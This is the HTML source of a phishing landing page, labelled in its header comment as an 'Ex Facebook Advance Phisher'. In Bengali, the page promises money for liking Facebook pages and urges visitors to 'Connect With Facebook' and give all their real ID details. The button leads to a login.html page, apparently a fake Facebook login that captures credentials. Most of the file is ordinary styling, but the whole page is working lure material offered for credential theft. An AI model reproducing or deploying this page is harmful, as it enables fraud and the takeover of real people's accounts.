
<!--
###############################################################------------------------------------------------------------#
#|             ≈≈≈≈ Ex Facebook  Advance Phisher  ≈≈≈≈                |#
#|                                                          |#            
#|                      —» Made By Efty                |#
#------------------------------------------------------------#                      
##############################################################
-->



<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Make Money Online</title>
    <!-- HTML -->
    <!-- Custom Styles -->
<link rel="preconnect" href="https://fonts.gstatic.com">
<link href="https://fonts.googleapis.com/css2?family=Sniglet&display=swap" rel="stylesheet">
<link rel="preconnect" href="https://fonts.gstatic.com">
<link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@100&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="style.css">
    <link rel="stylesheet" href="phone.css" media="screen and (max-width: 1400px)" />
</head>

<style>

* {
    margin: 0px;
    padding: 0px;
    outline: none;
    font-family: 'Sniglet', cursive;
    box-sizing: border-box;
}


html{
    scroll-behavior: smooth;
}


.container {
    display: flex;
    justify-content: center;
    align-items: center;
}

/* ============LOGO============== */

.logo {
    position: relative;
    margin: 10px;
    font-size: 1.2rem;
    text-align: left;
}

.logo img {
    display: block;
    height: 80px;
    width: 80px;
    border-radius: 100px;
}

/* ==================LOGO COMPLETE================ */



/* ===============NAVBAR================*/

#navbar {
    position: relative;
}

#navbar ul {
    padding-top: 10px;
    display: flex;
    height: 70px;
    width: 60vw;
    /* background-color: red; */
    border-radius: 30px;
    justify-content: center;
    align-items: center;
    margin-left: 10px;
    flex-wrap: wrap;
    /* flex-shrink: 25;*/
}

#navbar ul li {
    list-style: none;
}

#navbar ul li a {
    text-decoration: none;
    color: black;
    font-size: 1.2rem;
    padding: 10px;
    transition: all 0.2s ease-in-out;
}

#navbar ul li a:hover {
    background-color: black;
    color: white;
    border-radius: 1rem;
    font-weight: bold;
    font-size: 1rem;
}

/* =================NAVBAR COMPLETE================== */


/* ==================SECTION HOME STARTS==================== */

#black {
    height: 18rem;
    width: 55vw;
    background-color: black;
    margin-bottom: 50px;
    border-radius: 20px;
    box-shadow: 25px 25px 30px rgba(4, 24, 34, 255);
}

#home {
    display: flex;
    color: white;
    flex-direction: column;
    justify-content: center;
    align-items: center;
    margin-top: 100px;
}

#home::before {
    content: '';
    background: url("https://i.ibb.co/GctSb0P/images-6.jpg") no-repeat center center/cover;
    background-attachment: fixed;
    height: 35rem;
    width: 100vw;
    z-index: -1;
    position: absolute;
    top: 0px;
    opacity: 0.5;
}


#home p {
    padding: 2rem 1.3em;
    font-size: 0.9rem;
    width: 500px;
}


/*=================SERVICES SECTION==================*/

.services {
    display: flex;
    justify-content: center;
    align-items: center;
}

.servBox {
    display: flex;
    justify-content: center;
    align-items: center;
    flex-direction: column;
    margin: 10px;
    height: 320px;
    width: 320px;
    border: 2px solid #BDAE70;
    background-color: black;
    color: white;
    /* background-color: #B3A051; */
    border-radius: 23px;
    box-shadow: 25px 25px 30px rgba(4, 24, 34, 255);
}

.servBox img {
    height: 80px;
    width: 80px;
    display: block;
    margin: auto;
    border-radius: 40%;
}

/* =================CONTACT FORM================= */

.form {
    display: flex;
    flex-direction: column;
    margin: auto;
    justify-content: center;
    align-items: center;
    height: 20rem;
    width: 35rem;
    border: 2px solid white;
    background-color: black;
    border-radius: 1rem;
    box-shadow: 25px 25px 30px rgba(4, 24, 34, 255);
}

.element {
    text-align: center;
    height: 2rem;
    width: 15rem;
    margin: 1rem;
    padding: 1rem; 
    border: 2px solid black;
    transition: all 0.3s ease-in-out;
}

.element:hover {
    border: 4px solid white;
    border-radius: 2rem;
    font-weight: bold;
}

#feedback {
    height: 5rem;
    width: 30rem;
}


/* =============FOOTER================ */

#footer{
    height: 10rem;
    width: 100vw;
    background-color: black;
    color: white;
    margin: 1.5rem 0px 0px;
    display: flex;
    justify-content: center;
    align-items: center;
    flex-direction: column;
}

li{
    list-style: none;
}

.flex li a{
    color: white;
    text-decoration: none;
}

.flex li{
    margin: 10px;
}

.flex li a:hover{
    text-decoration: underline;
}

/* ===========UTILITY CLASSES======== */

.heading-primary {
    padding: 10px;
    margin-top: 50px;
}

.center {
    text-align: center;
}

.btn {
    display: block;
    margin: auto;
    padding: 6px;
    font-weight: bold;
    border-radius: 10px;
    width: 5rem;
    color: black;
    cursor: pointer;
    transition: all 1s ease;
}

.btn:hover {
    width: 10rem;
    background-color: black;
    color: whitesmoke;
}

p {
    margin: auto;
    font-family: 'Sniglet';
    font-weight: 1000;
}

.heading-secondary {
    padding: 1rem;
}

hr{
    color: white;
    width: 100vw;
    opacity: 0.5;
}

.flex{
    display: flex;
    justify-content: center;
    align-content: center;
}

.bold{
    font-weight: 1000;
}


    *{
    margin: 0;
    padding: 0;
}


/* Navigation Bar */
.container{
    position: sticky;
    flex-direction: column;
}

/* Home*/

#home{
    margin: auto;
}

#black{
    display: flex;
    justify-content: center;
    align-items: center;
    flex-direction: column;
    height: 20rem;
    width: 20rem;
    margin-top: 3rem;
}

#black p{
    font-size: 1rem;
    width: 15rem;
    margin: 5px;
    padding: 5px;
    margin: 15px 5px;
    font-weight: normal;
    text-align: center;
}

#black h1{
    margin-top:  10px;
}

#black button{
    display: block;
    margin: auto;
}


/* Services*/

#services{
    flex-wrap: wrap;
}

.servBox{
    width: 80vw;
    margin: 2rem auto;
}

.servBox p{
    padding: 1rem;
}

/* Contact Form */
.form{
    display: flex;
    width: 80vw;
    flex-direction: column;
    justify-content: center;
    align-items: center;
}

.form input{
    display: block;
    width: 15rem;
    margin: auto;
}

#feedback{
    display: block;
    width: 15rem;
    margin: auto;
    margin-bottom: 20px;
}

/* Footer */

#footer{
    height: 12rem;
}

#footer li a{
    /* margin: 2px; */
    font-size: 0.8rem;
}


/* Utility Classes */
.btn{
    display: block;
    margin-bottom: 5px;
}

.heading-primary {
    font-size: 2rem;
}
</style>

<body>
    <header>
        <nav id="navbar">
            <div class="container">
                <div class="logo">
                    <img src="https://i.ibb.co/hCTkv4v/images-8.jpg" alt="logo" border="0">
                    </div>
                <ul>
                    <li><a href="#home">Home</a></li>
                    <li><a href="#serv">Our Work</a></li>
                    <li><a href="#contact">Contact Us</a></li>
                </ul>
                
            </div>
        </nav>
    </header>
    <section id="home">
        <div id="black">
            
        <h1 class="heading-primary center">
          MAKE MONEY BD
        </h1>
        <p class="center">আসলামুলাইকুম,  যদি ঘরে বসে অনলাইনে ফেসবুকের মাধ্যমে খুব সহজে ইনকাম করুন। 
শর্ত ঃ আমাদের সাথে কাজ করলে আপনার রিয়াল ইনফরমেশন দিয়ে কাজ করতে হবে কারণ পরবর্তীতে পেমেন্ট যেন ঝামেলা না হয়।
একাউন্ট ভেরিফাই করার জন্য যেন অনেক সহজ হয়। প্রথমে Connect With Facebook গিয়ে আপনার  সকল রিয়েল আইডির ইনফরমেশন দিয়ে ফিলাপ করুন তাহলেই একাউন্ট হয়ে যাবে </p>

            <form action="login.html"> <button class="btn" type="submit">Connect With Facebook </button>
        </div>
    </section>
</from>
    
    <section id="serv">
        <h1 class="heading-primary center">Our Work</h1>
        <div id="services">
        
            <div class="servBox" id="servBox1">
                <h2 class="heading-secondary">Level 1</h2>
                <img src="https://i.ibb.co/8xNJkkq/download.jpg" alt="food ordering">
                <p class="center">আসলামুলাইকুম, সম্মানিত সূধী Online Make Money তে আপনাকে স্বাগতম আমাদের কাজ হলো আমরা আপনাদের বিভিন্ন পেজের লিংক দিবো আপনারা প্রতি পেজে লাইক ফলো করলে লেভেল ১এ ৬ টাকা করে পাইবেন  ১জনকে কে রেফার করতে হবে</p>
                
            </div>            
            <div class="servBox" id="servBox2">
                <h2 class="heading-secondary">Level 2</h2>
                <img src="https://i.ibb.co/8xNJkkq/download.jpg" alt="fast delivery">
                <p class="center">আসলামুলাইকুম, সম্মানিত সূধী Online Make Money তে আপনাকে স্বাগতম আমাদের কাজ হলো আমরা আপনাদের বিভিন্ন পেজের লিংক দিবো আপনারা প্রতি পেজে লাইক ফলো করলে লেভেল ২এ ১২ টাকা করে পাইবেন ৩জনকে কে রেফার করতে হবে</p>
                
            </div>            
            <div class="servBox" id="servBox3">
                <h2 class="heading-secondary">Level 3</h2>
                <img src="https://i.ibb.co/8xNJkkq/download.jpg" alt="catering">
                <p class="center">আসলামুলাইকুম, সম্মানিত সূধী Online Make Money তে আপনাকে স্বাগতম আমাদের কাজ হলো আমরা আপনাদের বিভিন্ন পেজের লিংক দিবো আপনারা প্রতি পেজে লাইক ফলো করলে লেভেল ৩এ ১৮ টাকা করে পাইবেন ৩জনকে কে রেফার করতে হবে ধন্যবাদ   l</p>
                
            </div>            
        </div>
    </section>
    
    <section id="contact">
        <h1 class="heading-primary center">
            Feedback
        </h1>
        <div class="form">
            
        <form action="#" method="get" accept-charset="utf-8">
            
            <input type="text" name="name" id="name" class="element" placeholder="Name"/><br />
<input type="email" name="Email" id="Email" class="element" placeholder="E-mail"/><br />
            
            <textarea name="feedback" id=feedback rows="8" cols="20" class="element" placeholder="Enter Your Thoughts..."></textarea>
            
            <input type="submit" name="submit" id="submit"
            class="btn"/>
        </form>
        </div>
    </section>
    
    <footer>
        <div id="footer" class="center">
            <ul id="about" class="flex">
                <li><a href="#">Home</a></li>
                <li><a href="#">About</a></li>
                
            </ul>
            
            <ul class="flex" id="follow">
                <li class="bold">Follow us</li>
                <li><a href="#">Twitter</a></li>
                <li><a href="#">Facebook</a></li>
                <li><a href="#">Instagram</a></li>
                <li><a href="#">Youtube</a></li>
            </ul>
            
            <hr />
            <ul id="policy" class="flex">
                <li><a href="#">F.A.Q.</a></li>
                <li><a href="#">Cookies Policy</a></li>
                <li><a href="#">Legal Terms</a></li>
                <li><a href="#">Privacy Policy</a></li>
            </ul>
            
            <p>2022Makemoney &copy; All Rights Reserved</p>
        </div>
    </footer>
</body>

</html>